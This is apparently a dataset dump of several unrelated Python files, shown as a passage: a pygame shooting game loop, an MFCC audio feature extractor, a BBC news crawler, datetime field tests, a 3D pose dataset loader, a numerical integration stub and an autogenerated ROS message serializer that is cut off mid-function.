Monster1.draw(win)
Monster2.draw(win)
Monster3.draw(win)
score = font.render('Score : ' + str(s), 1, (0, 0, 0))
win.blit(score, (430, 30))
for bullet in bullets:
bullet.draw(win)
pygame.display.update()
# mainloop
Y = 300
X = 30
X1 = random.randint(500, 590)
X2 = random.randint(660, 760)
X3 = random.randint(830, 900)
Y1 = random.randint(60, 720)
Y2 = random.randint(40, 720)
Y3 = random.randint(60, 720)
player1 = player(X, Y)
Monster1 = enemy(X1, Y1)
Monster2 = enemy(X2, Y2)
Monster3 = enemy(X3, Y3)
bullets = []
trace = []
traceShow = []
color = []
resetTrace = False
shootStage = 0
showText = 0
maxHeight = 0
ranges = 0
r = 1
s = 0
### START ###
runing = True
while runing:
clock.tick(FPS)
for event in pygame.event.get():
if event.type == pygame.QUIT:
runing = False
keys = pygame.key.get_pressed()
if keys[pygame.K_UP]:
if player1.y > 0:
player1.y -= player1.move
else:
player1.y = 0
if keys[pygame.K_DOWN]:
if player1.y < screen_height-30:
player1.y += player1.move
print(player1.y)
else:
player1.y = screen_height-30
print(player1.y)
if keys[pygame.K_RIGHT]:
if player1.x < screen_width-540:
player1.x += player1.move
print(player1.x)
else:
player1.x = screen_width-540
print(player1.x)
if keys[pygame.K_LEFT]:
if player1.x > 0:
player1.x -= player1.move
else:
player1.x = 0
if keys[pygame.K_SPACE]:
if shootStage == 0:
bullets.append(projectile(player1.x, player1.y, Vx, Vy))
shootStage = 1
trace.clear()
for bullet in bullets:
bullet.update()
traceShow = trace
if bullet.y - 5 < Monster1.hitbox[1] + Monster1.hitbox[3] and bullet.y + 5 > Monster1.hitbox[1]:
if bullet.x + 5 > Monster1.hitbox[0] and bullet.x - 5 < Monster1.hitbox[0] + Monster1.hitbox[2]:
bullet.status = 0
X1 = random.randint(500, 590)
Y1 = random.randint(60, 720)
Monster1 = enemy(X1, Y1)
s += 1
if bullet.y - 5 < Monster2.hitbox[1] + Monster2.hitbox[3] and bullet.y + 5 > Monster2.hitbox[1]:
if bullet.x + 5 > Monster2.hitbox[0] and bullet.x - 5 < Monster2.hitbox[0] + Monster2.hitbox[2]:
bullet.status = 0
X2 = random.randint(660, 760)
Y2 = random.randint(60, 720)
Monster2 = enemy(X2, Y2)
s += 1
if bullet.y - 5 < Monster3.hitbox[1] + Monster3.hitbox[3] and bullet.y + 5 > Monster3.hitbox[
1]:
if bullet.x + 5 > Monster3.hitbox[0] and bullet.x - 5 < Monster3.hitbox[0] + Monster3.hitbox[
2]:
bullet.status = 0
X3 = random.randint(830, 900)
Y3 = random.randint(60, 720)
Monster3 = enemy(X3, Y3)
s += 1
if bullet.status == 0:
shootStage = 0
bullets.pop(bullets.index(bullet))
display(s)
pygame.display.update()
pygame.quit()
|
5,189 | cca1a491e2a48b4b0c7099a6c54e528158ef30bb | #!/usr/bin/python
import sys, os, glob, numpy
wd = os.path.dirname(os.path.realpath(__file__))
sys.path.append(wd + '/python_speech_features')
from features import mfcc, logfbank
import scipy.io.wavfile as wav
DIR = '/home/quiggles/Desktop/513music/single-genre/classify-me/subset'
OUTDIR = wd + '/songdata/subset'
# def getMFCC(filename):
# (rate,sig) = wav.read(filename)
# mfcc_feat = mfcc(sig,rate)
# l = len(mfcc_feat)/4
# quartileMean1 = numpy.mean(mfcc_feat[:l], axis=0)
# quartileMean2 = numpy.mean(mfcc_feat[l:2*l], axis=0)
# quartileMean3 = numpy.mean(mfcc_feat[2*l:3*l], axis=0)
# quartileMean4 = numpy.mean(mfcc_feat[3*l:], axis=0)
# return numpy.concatenate([quartileMean1, quartileMean2, quartileMean3, quartileMean4])
# def getLogFBank(filename):
# (rate,sig) = wav.read(filename)
# logfbank_feat = logfbank(sig,rate)
# l = len(logfbank_feat)/4
# quartileMean1 = numpy.mean(logfbank_feat[:l], axis=0)
# quartileMean2 = numpy.mean(logfbank_feat[l:2*l], axis=0)
# quartileMean3 = numpy.mean(logfbank_feat[2*l:3*l], axis=0)
# quartileMean4 = numpy.mean(logfbank_feat[3*l:], axis=0)
# return numpy.concatenate([quartileMean1, quartileMean2, quartileMean3, quartileMean4])
def getQuartileMeans(values):
l = len(values)/4
quartileMean1 = numpy.mean(values[:l], axis=0)
quartileMean2 = numpy.mean(values[l:2*l], axis=0)
quartileMean3 = numpy.mean(values[2*l:3*l], axis=0)
quartileMean4 = numpy.mean(values[3*l:], axis=0)
return [quartileMean1, quartileMean2, quartileMean3, quartileMean4]
def getMFCC(rate,sig):
mfcc_feat = mfcc(sig,rate)
return numpy.concatenate(getQuartileMeans(mfcc_feat))
def getLogFBank(rate,sig):
logfbank_feat = logfbank(sig,rate)
return numpy.concatenate(getQuartileMeans(logfbank_feat))
def getData(filename, outdir=None):
if outdir is None or not os.path.exists(outdir + '/' + os.path.splitext(os.path.basename(filename))[0] + ".csv"):
(rate,sig) = wav.read(filename)
# mfccVals = getMFCC(rate, sig)
# logfVals = getLogFBank(rate, sig)
# return numpy.concatenate([mfccVals, logfVals])
return getMFCC(rate,sig)
def writeData(filename, outdir, values):
if not os.path.exists(outdir + '/' + os.path.splitext(os.path.basename(filename))[0] + ".csv"):
with open(outdir + '/' + os.path.splitext(os.path.basename(filename))[0] + ".csv", 'w') as f:
addComma = False
for val in values:
if addComma:
f.write(',')
f.write(str(val))
addComma = True
f.write('\n')
def generateMFCCData(indir, outdir):
for f in glob.glob(outdir + '/*.csv'):
os.remove(f)
# for f in glob.glob(outdir + '/*.logf'):
# os.remove(f)
for f in glob.glob(indir + '/*.wav'):
try:
writeData(f, outdir, getData(f, outdir))
newfilename = os.path.splitext(os.path.basename(f))[0]
print('YES: '+ newfilename)
if 'classify-me' not in indir:
os.rename(f, indir+"/classify-me/" + newfilename+".wav")
os.rename(indir+'/' + newfilename + ".mp3", indir+"/classify-me/" + newfilename+".mp3")
except:
print('NO: '+f)
if __name__ == '__main__':
generateMFCCData(DIR, OUTDIR)
|
5,190 | 3c22fbfd7d83ff3ecacabc3c88af2169fa5906b9 | """ [BBC] Web Scraper """
import os
from .abstract_crawler import AbstractWebCrawler
class BBCCrawler(AbstractWebCrawler):
""" [BBC] Web Scraper """
# Spider Properties
name = "web_bbc"
# Crawler Properties
resource_link = 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security'
resource_label = 'bbc'
# TODO Move it to the super class
custom_settings = {
'ITEM_PIPELINES': {
'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500
}
}
links_to_articles_query = 'article > header > div > h3 > a::attr(href)'
links_to_pages_query = 'dummy' # dynamic ajax pagination
extract_title_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'
extract_datetime_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'
extract_content_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'
|
5,191 | 92b22ea23ad0cf4e16c7d19d055b7ec152ca433a | from scheme import *
from tests.util import *
class TestDateTime(FieldTestCase):
def test_instantiation(self):
with self.assertRaises(TypeError):
DateTime(minimum=True)
with self.assertRaises(TypeError):
DateTime(maximum=True)
def test_processing(self):
field = DateTime()
self.assert_processed(field, None)
self.assert_not_processed(field, 'invalid', True)
now = datetime.now().replace(microsecond=0)
now_local = now.replace(tzinfo=LOCAL)
now_utc = now_local.astimezone(UTC)
now_text = now_utc.strftime('%Y-%m-%dT%H:%M:%SZ')
self.assertEqual(field.process(now_text, INBOUND, True), now_local)
self.assertEqual(field.process(now, OUTBOUND, True), now_text)
self.assertEqual(field.process(now_local, OUTBOUND, True), now_text)
self.assertEqual(field.process(now_utc, OUTBOUND, True), now_text)
def test_utc_processing(self):
field = DateTime(utc=True)
self.assert_processed(field, None)
self.assert_not_processed(field, 'invalid', True)
now = datetime.utcnow().replace(microsecond=0)
now_utc = now.replace(tzinfo=UTC)
now_text = now_utc.strftime('%Y-%m-%dT%H:%M:%SZ')
self.assertEqual(field.process(now_text, INBOUND, True), now_utc)
self.assertEqual(field.process(now, OUTBOUND, True), now_text)
self.assertEqual(field.process(now_utc, OUTBOUND, True), now_text)
def test_minimum(self):
now, now_text = construct_now()
for field in (DateTime(minimum=now), DateTime(minimum=now_text)):
self.assertEqual(field.minimum, now)
self.assert_processed(field, (now, now_text), (now, now_text))
self.assert_processed(field, (now, now_text), construct_now(+1))
self.assert_not_processed(field, 'minimum', construct_now(-60))
def test_maximum(self):
now, now_text = construct_now()
for field in (DateTime(maximum=now), DateTime(maximum=now_text)):
self.assertEqual(field.maximum, now)
self.assert_processed(field, (now, now_text), (now, now_text))
self.assert_processed(field, (now, now_text), construct_now(-60))
self.assert_not_processed(field, 'maximum', construct_now(+60))
def test_interpolation(self):
field = DateTime()
now = datetime.now()
self.assert_interpolated(field, None, now)
self.assert_interpolated(field, ('${value}', now), value=now)
def test_description(self):
now_text = '2012-01-01T00:00:00Z'
field = DateTime(name='test', utc=True, minimum=now_text)
self.assertEqual(field.describe(), {'fieldtype': 'datetime', 'name': 'test',
'minimum': now_text, 'utc': True})
field = DateTime(name='test', utc=True, maximum=now_text)
self.assertEqual(field.describe(), {'fieldtype': 'datetime', 'name': 'test',
'maximum': now_text, 'utc': True})
field = DateTime(name='test', utc=True, minimum=now_text, maximum=now_text)
self.assertEqual(field.describe(), {'fieldtype': 'datetime', 'name': 'test',
'minimum': now_text, 'maximum': now_text, 'utc': True})
|
5,192 | cf6dffb28e37003212d3e3402dee58a57a7d9869 | from __future__ import print_function, absolute_import, division
import os
import h5py
import glob
import copy
import numpy as np
from tqdm import tqdm
# from utils.pose import draw_skeleton
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import poseutils.camera_utils as cameras
from poseutils.view import draw_skeleton
from poseutils.props import get_body_centered_axes
from poseutils.transform import normalize_skeleton
from poseutils.transform import normalize_zscore
parents = [-1, 0, 1, 2, 0, 4, 5, 0, 7, 8, 8, 10, 11, 8, 13, 14]
joints_left = [4, 5, 6, 10, 11, 12]
joints_right = [1, 2, 3, 13, 14, 15]
skeleton_3DPW_joints_group = [[2, 3], [5, 6], [1, 4], [0, 7], [12, 13], [9, 10], [8, 11]]
NAMES_3DPW = ['']*14
NAMES_3DPW[0] = 'Hip'
NAMES_3DPW[1] = 'RHip'
NAMES_3DPW[2] = 'RKnee'
NAMES_3DPW[3] = 'RAnkle'
NAMES_3DPW[4] = 'LHip'
NAMES_3DPW[5] = 'LKnee'
NAMES_3DPW[6] = 'LAnkle'
# NAMES_3DPW[7] = 'Spine2'
NAMES_3DPW[7] = 'Neck'
# NAMES_3DPW[8] = 'Head'
NAMES_3DPW[8] = 'LUpperArm'
NAMES_3DPW[9] = 'LElbow'
NAMES_3DPW[10] = 'LWrist'
NAMES_3DPW[11] = 'RUpperArm'
NAMES_3DPW[12] = 'RElbow'
NAMES_3DPW[13] = 'RWrist'
# Human3.6m IDs for training and testing
TRAIN_SUBJECTS = ['S0']
TEST_SUBJECTS = ['S0']
class TDPWDataset(object):
def __init__(self, path, center_2d=False, load_metrics=None, skel_norm=False):
# TODO: Update the fps here if needed
super(TDPWDataset, self).__init__()
# TODO: Update camera later if needed
self.cameras = None
self._data_train = { "2d": np.zeros((0, 14, 2), dtype=np.float32), "3d": np.zeros((0, 14, 3), dtype=np.float32), "axes": [] }
self._data_valid = { "2d": np.zeros((0, 14, 2), dtype=np.float32), "3d": np.zeros((0, 14, 3), dtype=np.float32), "axes": [] }
self.mean_2d = 0.0
self.std_2d = 0.0
self.mean_3d = 0.0
self.std_3d = 0.0
self.center_2d = center_2d
self.skel_norm = skel_norm
self.cameras = []
self.load_data(path)
def load_data(self, path, load_metrics=None):
filename = os.path.splitext(os.path.basename(path))[0]
indices_to_select = [0, 2, 5, 8, 1, 4, 7, 12, 16, 18, 20, 17, 19, 21]
data = np.load(path, allow_pickle=True, encoding='latin1')['data'].item()
data_train = data['train']
data_valid = data['test']
self._data_train['2d'] = data_train["combined_2d"][:, indices_to_select, :]
self._data_train['3d'] = data_train["combined_3d_cam"][:, indices_to_select, :]*1000
self._data_valid['2d'] = data_valid["combined_2d"][:, indices_to_select, :]
self._data_valid['3d'] = data_valid["combined_3d_cam"][:, indices_to_select, :]*1000
self._data_train['3d'] -= self._data_train['3d'][:, :1, :]
self._data_valid['3d'] -= self._data_valid['3d'][:, :1, :]
if self.center_2d:
self._data_train['2d'] -= self._data_train['2d'][:, :1, :]
self._data_valid['2d'] -= self._data_valid['2d'][:, :1, :]
_, _, _, self._data_train['axes'] = get_body_centered_axes(self._data_train['3d'])
_, _, _, self._data_valid['axes'] = get_body_centered_axes(self._data_valid['3d'])
if self.skel_norm:
self._data_train['2d'] = normalize_skeleton(self._data_train['2d'])
self._data_valid['2d'] = normalize_skeleton(self._data_valid['2d'])
# self.plot_random()
self.mean_3d = np.mean(self._data_train['3d'], axis=0)
self.std_3d = np.std(self._data_train['3d'], axis=0)
self._data_train['3d'] = normalize_zscore(self._data_train['3d'], self.mean_3d, self.std_3d, skip_root=True)
self._data_valid['3d'] = normalize_zscore(self._data_valid['3d'], self.mean_3d, self.std_3d, skip_root=True)
if not self.skel_norm:
self.mean_2d = np.mean(self._data_train['2d'], axis=0)
self.std_2d = np.std(self._data_train['2d'], axis=0)
self._data_train['2d'] = normalize_zscore(self._data_train['2d'], self.mean_2d, self.std_2d, skip_root=self.center_2d)
self._data_valid['2d'] = normalize_zscore(self._data_valid['2d'], self.mean_2d, self.std_2d, skip_root=self.center_2d)
def define_actions(self, action=None):
all_actions = ["N"]
if action is None:
return all_actions
if action not in all_actions:
raise (ValueError, "Undefined action: {}".format(action))
return [action]
def get_2d_valid(self):
return [self._data_valid['2d'].reshape((-1, 14, 2))]
def get_3d_valid(self):
return [self._data_valid['3d'].reshape((-1, 14, 3))]
def get_2d_train(self):
return [self._data_train['2d'].reshape((-1, 14, 2))]
def get_3d_train(self):
return [self._data_train['3d'].reshape((-1, 14, 3))]
def get_axes_train(self):
return [self._data_train['axes'][:, :, :2]]
def get_axes_valid(self):
return [self._data_valid['axes'][:, :, :2]]
def get_joints_group(self):
return skeleton_3DPW_joints_group
def plot_random(self):
idx = np.random.randint(0, high=self._data_train['3d'].shape[0])
fig = plt.figure(figsize=(12, 6))
ax = fig.add_subplot(121, projection='3d')
bx = fig.add_subplot(122)
draw_skeleton(self._data_train['3d'][idx, :, :]/1000, ax)
draw_skeleton(self._data_train['2d'][idx, :, :], bx)
ax.set_xlabel("X")
ax.set_ylabel("Y")
ax.set_zlabel("Z")
ax.set_xlim((-1, 1))
ax.set_ylim((-1, 1))
ax.set_zlim((-1, 1))
bx.set_xlim((-960, 960))
bx.set_ylim((960, -960))
plt.show() |
5,193 | d99278c8f539322fd83ae5459c3121effc044b88 | from trapezoidal import trapezoidal
from midpoint import midpoint
from math import pi, sin
def integrate_sine(f, a, b, n = 2):
I_t = trapezoidal(f, a, b, n)
I_m = midpoint()
return None
a = 0.0; b = pi
f = lambda x: sin(x) |
5,194 | b8e18877af990c533c642d4937354198a4676419 | """autogenerated by genpy from arm_navigation_msgs/GetPlanningSceneRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import arm_navigation_msgs.msg
import geometry_msgs.msg
import std_msgs.msg
import genpy
import sensor_msgs.msg
class GetPlanningSceneRequest(genpy.Message):
_md5sum = "67ad55e9bed9c8f21dfb4b9b1ca8df7d"
_type = "arm_navigation_msgs/GetPlanningSceneRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
PlanningScene planning_scene_diff
arm_navigation_msgs/OrderedCollisionOperations operations
================================================================================
MSG: arm_navigation_msgs/PlanningScene
#full robot state
arm_navigation_msgs/RobotState robot_state
#additional frames for duplicating tf
geometry_msgs/TransformStamped[] fixed_frame_transforms
#full allowed collision matrix
AllowedCollisionMatrix allowed_collision_matrix
#allowed contacts
arm_navigation_msgs/AllowedContactSpecification[] allowed_contacts
#all link paddings
arm_navigation_msgs/LinkPadding[] link_padding
#collision objects
arm_navigation_msgs/CollisionObject[] collision_objects
arm_navigation_msgs/AttachedCollisionObject[] attached_collision_objects
#the collision map
arm_navigation_msgs/CollisionMap collision_map
================================================================================
MSG: arm_navigation_msgs/RobotState
# This message contains information about the robot state, i.e. the positions of its joints and links
sensor_msgs/JointState joint_state
arm_navigation_msgs/MultiDOFJointState multi_dof_joint_state
================================================================================
MSG: sensor_msgs/JointState
# This is a message that holds data to describe the state of a set of torque controlled joints.
#
# The state of each joint (revolute or prismatic) is defined by:
# * the position of the joint (rad or m),
# * the velocity of the joint (rad/s or m/s) and
# * the effort that is applied in the joint (Nm or N).
#
# Each joint is uniquely identified by its name
# The header specifies the time at which the joint states were recorded. All the joint states
# in one message have to be recorded at the same time.
#
# This message consists of a multiple arrays, one for each part of the joint state.
# The goal is to make each of the fields optional. When e.g. your joints have no
# effort associated with them, you can leave the effort array empty.
#
# All arrays in this message should have the same size, or be empty.
# This is the only way to uniquely associate the joint name with the correct
# states.
Header header
string[] name
float64[] position
float64[] velocity
float64[] effort
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.secs: seconds (stamp_secs) since epoch
# * stamp.nsecs: nanoseconds since stamp_secs
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: arm_navigation_msgs/MultiDOFJointState
#A representation of a multi-dof joint state
time stamp
string[] joint_names
string[] frame_ids
string[] child_frame_ids
geometry_msgs/Pose[] poses
================================================================================
MSG: geometry_msgs/Pose
# A representation of pose in free space, composed of postion and orientation.
Point position
Quaternion orientation
================================================================================
MSG: geometry_msgs/Point
# This contains the position of a point in free space
float64 x
float64 y
float64 z
================================================================================
MSG: geometry_msgs/Quaternion
# This represents an orientation in free space in quaternion form.
float64 x
float64 y
float64 z
float64 w
================================================================================
MSG: geometry_msgs/TransformStamped
# This expresses a transform from coordinate frame header.frame_id
# to the coordinate frame child_frame_id
#
# This message is mostly used by the
# <a href="http://www.ros.org/wiki/tf">tf</a> package.
# See it's documentation for more information.
Header header
string child_frame_id # the frame id of the child frame
Transform transform
================================================================================
MSG: geometry_msgs/Transform
# This represents the transform between two coordinate frames in free space.
Vector3 translation
Quaternion rotation
================================================================================
MSG: geometry_msgs/Vector3
# This represents a vector in free space.
float64 x
float64 y
float64 z
================================================================================
MSG: arm_navigation_msgs/AllowedCollisionMatrix
# the list of link names in the matrix
string[] link_names
# the individual entries in the allowed collision matrix
# symmetric, with same order as link_names
AllowedCollisionEntry[] entries
================================================================================
MSG: arm_navigation_msgs/AllowedCollisionEntry
# whether or not collision checking is enabled
bool[] enabled
================================================================================
MSG: arm_navigation_msgs/AllowedContactSpecification
# The names of the regions
string name
# The shape of the region in the environment
arm_navigation_msgs/Shape shape
# The pose of the space defining the region
geometry_msgs/PoseStamped pose_stamped
# The set of links that will be allowed to have penetration contact within this region
string[] link_names
# The maximum penetration depth allowed for every link
float64 penetration_depth
================================================================================
MSG: arm_navigation_msgs/Shape
byte SPHERE=0
byte BOX=1
byte CYLINDER=2
byte MESH=3
byte type
#### define sphere, box, cylinder ####
# the origin of each shape is considered at the shape's center
# for sphere
# radius := dimensions[0]
# for cylinder
# radius := dimensions[0]
# length := dimensions[1]
# the length is along the Z axis
# for box
# size_x := dimensions[0]
# size_y := dimensions[1]
# size_z := dimensions[2]
float64[] dimensions
#### define mesh ####
# list of triangles; triangle k is defined by tre vertices located
# at indices triangles[3k], triangles[3k+1], triangles[3k+2]
int32[] triangles
geometry_msgs/Point[] vertices
================================================================================
MSG: geometry_msgs/PoseStamped
# A Pose with reference coordinate frame and timestamp
Header header
Pose pose
================================================================================
MSG: arm_navigation_msgs/LinkPadding
#name for the link
string link_name
# padding to apply to the link
float64 padding
================================================================================
MSG: arm_navigation_msgs/CollisionObject
# a header, used for interpreting the poses
Header header
# the id of the object
string id
# The padding used for filtering points near the object.
# This does not affect collision checking for the object.
# Set to negative to get zero padding.
float32 padding
#This contains what is to be done with the object
CollisionObjectOperation operation
#the shapes associated with the object
arm_navigation_msgs/Shape[] shapes
#the poses associated with the shapes - will be transformed using the header
geometry_msgs/Pose[] poses
================================================================================
MSG: arm_navigation_msgs/CollisionObjectOperation
#Puts the object into the environment
#or updates the object if already added
byte ADD=0
#Removes the object from the environment entirely
byte REMOVE=1
#Only valid within the context of a CollisionAttachedObject message
#Will be ignored if sent with an CollisionObject message
#Takes an attached object, detaches from the attached link
#But adds back in as regular object
byte DETACH_AND_ADD_AS_OBJECT=2
#Only valid within the context of a CollisionAttachedObject message
#Will be ignored if sent with an CollisionObject message
#Takes current object in the environment and removes it as
#a regular object
byte ATTACH_AND_REMOVE_AS_OBJECT=3
# Byte code for operation
byte operation
================================================================================
MSG: arm_navigation_msgs/AttachedCollisionObject
# The CollisionObject will be attached with a fixed joint to this link
# If link name is set to REMOVE_ALL_ATTACHED_OBJECTS and object.operation
# is set to REMOVE will remove all attached bodies attached to any object
string link_name
#Reserved for indicating that all attached objects should be removed
string REMOVE_ALL_ATTACHED_OBJECTS = "all"
#This contains the actual shapes and poses for the CollisionObject
#to be attached to the link
#If action is remove and no object.id is set, all objects
#attached to the link indicated by link_name will be removed
CollisionObject object
# The set of links that the attached objects are allowed to touch
# by default - the link_name is included by default
string[] touch_links
================================================================================
MSG: arm_navigation_msgs/CollisionMap
#header for interpreting box positions
Header header
#boxes for use in collision testing
OrientedBoundingBox[] boxes
================================================================================
MSG: arm_navigation_msgs/OrientedBoundingBox
#the center of the box
geometry_msgs/Point32 center
#the extents of the box, assuming the center is at the point
geometry_msgs/Point32 extents
#the axis of the box
geometry_msgs/Point32 axis
#the angle of rotation around the axis
float32 angle
================================================================================
MSG: geometry_msgs/Point32
# This contains the position of a point in free space(with 32 bits of precision).
# It is recommeded to use Point wherever possible instead of Point32.
#
# This recommendation is to promote interoperability.
#
# This message is designed to take up less space when sending
# lots of points at once, as in the case of a PointCloud.
float32 x
float32 y
float32 z
================================================================================
MSG: arm_navigation_msgs/OrderedCollisionOperations
# A set of collision operations that will be performed in the order they are specified
CollisionOperation[] collision_operations
================================================================================
MSG: arm_navigation_msgs/CollisionOperation
# A definition of a collision operation
# E.g. ("gripper",COLLISION_SET_ALL,ENABLE) will enable collisions
# between the gripper and all objects in the collision space
string object1
string object2
string COLLISION_SET_ALL="all"
string COLLISION_SET_OBJECTS="objects"
string COLLISION_SET_ATTACHED_OBJECTS="attached"
# The penetration distance to which collisions are allowed. This is 0.0 by default.
float64 penetration_distance
# Flag that determines whether collisions will be enabled or disabled for the pair of objects specified above
int32 operation
int32 DISABLE=0
int32 ENABLE=1
"""
__slots__ = ['planning_scene_diff','operations']
_slot_types = ['arm_navigation_msgs/PlanningScene','arm_navigation_msgs/OrderedCollisionOperations']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
planning_scene_diff,operations
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(GetPlanningSceneRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.planning_scene_diff is None:
self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()
if self.operations is None:
self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()
else:
self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()
self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs))
_x = self.planning_scene_diff.robot_state.joint_state.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene_diff.robot_state.joint_state.name)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.joint_state.name:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.joint_state.position)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.position))
length = len(self.planning_scene_diff.robot_state.joint_state.velocity)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.velocity))
length = len(self.planning_scene_diff.robot_state.joint_state.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *self.planning_scene_diff.robot_state.joint_state.effort))
_x = self
buff.write(_struct_2I.pack(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.poses)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.poses:
_v1 = val1.position
_x = _v1
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v2 = val1.orientation
_x = _v2
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene_diff.fixed_frame_transforms)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.fixed_frame_transforms:
_v3 = val1.header
buff.write(_struct_I.pack(_v3.seq))
_v4 = _v3.stamp
_x = _v4
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v3.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.child_frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v5 = val1.transform
_v6 = _v5.translation
_x = _v6
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v7 = _v5.rotation
_x = _v7
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene_diff.allowed_collision_matrix.link_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.allowed_collision_matrix.link_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.allowed_collision_matrix.entries)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.allowed_collision_matrix.entries:
length = len(val1.enabled)
buff.write(_struct_I.pack(length))
pattern = '<%sB'%length
buff.write(struct.pack(pattern, *val1.enabled))
length = len(self.planning_scene_diff.allowed_contacts)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.allowed_contacts:
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v8 = val1.shape
buff.write(_struct_b.pack(_v8.type))
length = len(_v8.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *_v8.dimensions))
length = len(_v8.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *_v8.triangles))
length = len(_v8.vertices)
buff.write(_struct_I.pack(length))
for val3 in _v8.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v9 = val1.pose_stamped
_v10 = _v9.header
buff.write(_struct_I.pack(_v10.seq))
_v11 = _v10.stamp
_x = _v11
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v10.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v12 = _v9.pose
_v13 = _v12.position
_x = _v13
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v14 = _v12.orientation
_x = _v14
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.link_names)
buff.write(_struct_I.pack(length))
for val2 in val1.link_names:
length = len(val2)
